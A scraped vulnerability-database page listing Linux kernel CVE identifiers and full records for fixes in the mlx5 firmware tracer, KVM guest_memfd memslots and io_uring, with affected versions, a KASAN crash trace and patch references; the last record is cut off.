"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68805"
},
{
"cve": "CVE-2025-68806",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68806"
},
{
"cve": "CVE-2025-68807",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68807"
},
{
"cve": "CVE-2025-68808",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68809",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68809"
},
{
"cve": "CVE-2025-68810",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68810"
},
{
"cve": "CVE-2025-68811",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68811"
},
{
"cve": "CVE-2025-68812",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68812"
},
{
"cve": "CVE-2025-68813",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68817",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68817"
},
{
"cve": "CVE-2025-68818",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68818"
},
{
"cve": "CVE-2025-68819",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-68821",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68821"
},
{
"cve": "CVE-2025-68822",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68822"
},
{
"cve": "CVE-2025-68823",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68823"
},
{
"cve": "CVE-2025-71064",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71065",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71065"
},
{
"cve": "CVE-2025-71066",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71067",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71067"
},
{
"cve": "CVE-2025-71068",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71068"
},
{
"cve": "CVE-2025-71069",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71069"
},
{
"cve": "CVE-2025-71070",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71070"
},
{
"cve": "CVE-2025-71071",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71071"
},
{
"cve": "CVE-2025-71072",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71072"
},
{
"cve": "CVE-2025-71073",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71073"
},
{
"cve": "CVE-2025-71074",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71074"
},
{
"cve": "CVE-2025-71075",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71075"
},
{
"cve": "CVE-2025-71076",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71076"
},
{
"cve": "CVE-2025-71077",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71080",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71080"
},
{
"cve": "CVE-2025-71081",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71090",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71090"
},
{
"cve": "CVE-2025-71091",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71092",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71092"
},
{
"cve": "CVE-2025-71093",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71096",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71096"
},
{
"cve": "CVE-2025-71097",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71099",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71099"
},
{
"cve": "CVE-2025-71100",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71101",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71101"
}
]
}
CVE-2025-68816 (GCVE-0-2025-68816)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
net/mlx5: fw_tracer, Validate format string parameters
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: fw_tracer, Validate format string parameters
Add validation for format string parameters in the firmware tracer to
prevent potential security vulnerabilities and crashes from malformed
format strings received from firmware.
The firmware tracer receives format strings from the device firmware and
uses them to format trace messages. Without proper validation, bad
firmware could provide format strings with invalid format specifiers
(e.g., %s, %p, %n) that could lead to crashes, or other undefined
behavior.
Add mlx5_tracer_validate_params() to validate that all format specifiers
in trace strings are limited to safe integer/hex formats (%x, %d, %i,
%u, %llx, %lx, etc.). Reject strings containing other format types that
could be used to access arbitrary memory or cause crashes.
Invalid format strings are added to the trace output for visibility with
"BAD_FORMAT: " prefix.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
70dd6fdb8987b14f7b6105f6be0617299e459398 , < 95624b731c490a4b849844269193a233d6d556a0
(git)
Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 768d559f466cdd72849110a7ecd76a21d52dcfe3 (git) Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 38ac688b52ef26a88f8bc4fe26d24fdd0ff91e5d (git) Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 8ac688c0e430dab19f6a9b70df94b1f635612c1a (git) Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 45bd283b1d69e2c97cddcb9956f0e0261fc4efd7 (git) Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 8c35c2448086870509ede43947845be0833251f0 (git) Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < b35966042d20b14e2d83330049f77deec5229749 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c",
"drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "95624b731c490a4b849844269193a233d6d556a0",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "768d559f466cdd72849110a7ecd76a21d52dcfe3",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "38ac688b52ef26a88f8bc4fe26d24fdd0ff91e5d",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "8ac688c0e430dab19f6a9b70df94b1f635612c1a",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "45bd283b1d69e2c97cddcb9956f0e0261fc4efd7",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "8c35c2448086870509ede43947845be0833251f0",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "b35966042d20b14e2d83330049f77deec5229749",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c",
"drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:21.606Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/95624b731c490a4b849844269193a233d6d556a0"
},
{
"url": "https://git.kernel.org/stable/c/768d559f466cdd72849110a7ecd76a21d52dcfe3"
},
{
"url": "https://git.kernel.org/stable/c/38ac688b52ef26a88f8bc4fe26d24fdd0ff91e5d"
},
{
"url": "https://git.kernel.org/stable/c/8ac688c0e430dab19f6a9b70df94b1f635612c1a"
},
{
"url": "https://git.kernel.org/stable/c/45bd283b1d69e2c97cddcb9956f0e0261fc4efd7"
},
{
"url": "https://git.kernel.org/stable/c/8c35c2448086870509ede43947845be0833251f0"
},
{
"url": "https://git.kernel.org/stable/c/b35966042d20b14e2d83330049f77deec5229749"
}
],
"title": "net/mlx5: fw_tracer, Validate format string parameters",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68816",
"datePublished": "2026-01-13T15:29:20.464Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-19T12:19:21.606Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68810 (GCVE-0-2025-68810)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot
Summary
In the Linux kernel, the following vulnerability has been resolved:
KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot
Reject attempts to disable KVM_MEM_GUEST_MEMFD on a memslot that was
initially created with a guest_memfd binding, as KVM doesn't support
toggling KVM_MEM_GUEST_MEMFD on existing memslots. KVM prevents enabling
KVM_MEM_GUEST_MEMFD, but doesn't prevent clearing the flag.
Failure to reject the new memslot results in a use-after-free due to KVM
not unbinding from the guest_memfd instance. Unbinding on a FLAGS_ONLY
change is easy enough, and can/will be done as a hardening measure (in
anticipation of KVM supporting dirty logging on guest_memfd at some point),
but fixing the use-after-free would only address the immediate symptom.
==================================================================
BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x362/0x400 [kvm]
Write of size 8 at addr ffff8881111ae908 by task repro/745
CPU: 7 UID: 1000 PID: 745 Comm: repro Not tainted 6.18.0-rc6-115d5de2eef3-next-kasan #3 NONE
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Call Trace:
<TASK>
dump_stack_lvl+0x51/0x60
print_report+0xcb/0x5c0
kasan_report+0xb4/0xe0
kvm_gmem_release+0x362/0x400 [kvm]
__fput+0x2fa/0x9d0
task_work_run+0x12c/0x200
do_exit+0x6ae/0x2100
do_group_exit+0xa8/0x230
__x64_sys_exit_group+0x3a/0x50
x64_sys_call+0x737/0x740
do_syscall_64+0x5b/0x900
entry_SYSCALL_64_after_hwframe+0x4b/0x53
RIP: 0033:0x7f581f2eac31
</TASK>
Allocated by task 745 on cpu 6 at 9.746971s:
kasan_save_stack+0x20/0x40
kasan_save_track+0x13/0x50
__kasan_kmalloc+0x77/0x90
kvm_set_memory_region.part.0+0x652/0x1110 [kvm]
kvm_vm_ioctl+0x14b0/0x3290 [kvm]
__x64_sys_ioctl+0x129/0x1a0
do_syscall_64+0x5b/0x900
entry_SYSCALL_64_after_hwframe+0x4b/0x53
Freed by task 745 on cpu 6 at 9.747467s:
kasan_save_stack+0x20/0x40
kasan_save_track+0x13/0x50
__kasan_save_free_info+0x37/0x50
__kasan_slab_free+0x3b/0x60
kfree+0xf5/0x440
kvm_set_memslot+0x3c2/0x1160 [kvm]
kvm_set_memory_region.part.0+0x86a/0x1110 [kvm]
kvm_vm_ioctl+0x14b0/0x3290 [kvm]
__x64_sys_ioctl+0x129/0x1a0
do_syscall_64+0x5b/0x900
entry_SYSCALL_64_after_hwframe+0x4b/0x53
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
a7800aa80ea4d5356b8474c2302812e9d4926fa6 , < 89dbbe6ff323fc34659621a577fe0af913f47386
(git)
Affected: a7800aa80ea4d5356b8474c2302812e9d4926fa6 , < cb51bef465d8ec60a968507330e01020e35dc127 (git) Affected: a7800aa80ea4d5356b8474c2302812e9d4926fa6 , < 9935df5333aa503a18de5071f53762b65c783c4c (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"virt/kvm/kvm_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "89dbbe6ff323fc34659621a577fe0af913f47386",
"status": "affected",
"version": "a7800aa80ea4d5356b8474c2302812e9d4926fa6",
"versionType": "git"
},
{
"lessThan": "cb51bef465d8ec60a968507330e01020e35dc127",
"status": "affected",
"version": "a7800aa80ea4d5356b8474c2302812e9d4926fa6",
"versionType": "git"
},
{
"lessThan": "9935df5333aa503a18de5071f53762b65c783c4c",
"status": "affected",
"version": "a7800aa80ea4d5356b8474c2302812e9d4926fa6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"virt/kvm/kvm_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot\n\nReject attempts to disable KVM_MEM_GUEST_MEMFD on a memslot that was\ninitially created with a guest_memfd binding, as KVM doesn\u0027t support\ntoggling KVM_MEM_GUEST_MEMFD on existing memslots. KVM prevents enabling\nKVM_MEM_GUEST_MEMFD, but doesn\u0027t prevent clearing the flag.\n\nFailure to reject the new memslot results in a use-after-free due to KVM\nnot unbinding from the guest_memfd instance. Unbinding on a FLAGS_ONLY\nchange is easy enough, and can/will be done as a hardening measure (in\nanticipation of KVM supporting dirty logging on guest_memfd at some point),\nbut fixing the use-after-free would only address the immediate symptom.\n\n ==================================================================\n BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x362/0x400 [kvm]\n Write of size 8 at addr ffff8881111ae908 by task repro/745\n\n CPU: 7 UID: 1000 PID: 745 Comm: repro Not tainted 6.18.0-rc6-115d5de2eef3-next-kasan #3 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x51/0x60\n print_report+0xcb/0x5c0\n kasan_report+0xb4/0xe0\n kvm_gmem_release+0x362/0x400 [kvm]\n __fput+0x2fa/0x9d0\n task_work_run+0x12c/0x200\n do_exit+0x6ae/0x2100\n do_group_exit+0xa8/0x230\n __x64_sys_exit_group+0x3a/0x50\n x64_sys_call+0x737/0x740\n do_syscall_64+0x5b/0x900\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x7f581f2eac31\n \u003c/TASK\u003e\n\n Allocated by task 745 on cpu 6 at 9.746971s:\n kasan_save_stack+0x20/0x40\n kasan_save_track+0x13/0x50\n __kasan_kmalloc+0x77/0x90\n kvm_set_memory_region.part.0+0x652/0x1110 [kvm]\n kvm_vm_ioctl+0x14b0/0x3290 [kvm]\n __x64_sys_ioctl+0x129/0x1a0\n do_syscall_64+0x5b/0x900\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\n Freed by task 745 on cpu 6 at 9.747467s:\n kasan_save_stack+0x20/0x40\n kasan_save_track+0x13/0x50\n __kasan_save_free_info+0x37/0x50\n __kasan_slab_free+0x3b/0x60\n kfree+0xf5/0x440\n kvm_set_memslot+0x3c2/0x1160 [kvm]\n kvm_set_memory_region.part.0+0x86a/0x1110 [kvm]\n kvm_vm_ioctl+0x14b0/0x3290 [kvm]\n __x64_sys_ioctl+0x129/0x1a0\n do_syscall_64+0x5b/0x900\n entry_SYSCALL_64_after_hwframe+0x4b/0x53"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:16.475Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/89dbbe6ff323fc34659621a577fe0af913f47386"
},
{
"url": "https://git.kernel.org/stable/c/cb51bef465d8ec60a968507330e01020e35dc127"
},
{
"url": "https://git.kernel.org/stable/c/9935df5333aa503a18de5071f53762b65c783c4c"
}
],
"title": "KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68810",
"datePublished": "2026-01-13T15:29:16.475Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-13T15:29:16.475Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68814 (GCVE-0-2025-68814)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
io_uring: fix filename leak in __io_openat_prep()
Summary
In the Linux kernel, the following vulnerability has been resolved:
io_uring: fix filename leak in __io_openat_prep()
__io_openat_prep() allocates a struct filename using getname(). However,
for the condition of the file being installed in the fixed file table as
well as having O_CLOEXEC flag set, the function returns early. At that
point, the request doesn't have REQ_F_NEED_CLEANUP flag set. Due to this,
the memory for the newly allocated struct filename is not cleaned up,
causing a memory leak.
Fix this by setting the REQ_F_NEED_CLEANUP for the request just after the
successful getname() call, so that when the request is torn down, the
filename will be cleaned up, along with other resources needing cleanup.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
b9445598d8c60a1379887b957024b71343965f74 , < 2420ef01b2e836fbc05a0a8c73a1016504eb0458
(git)
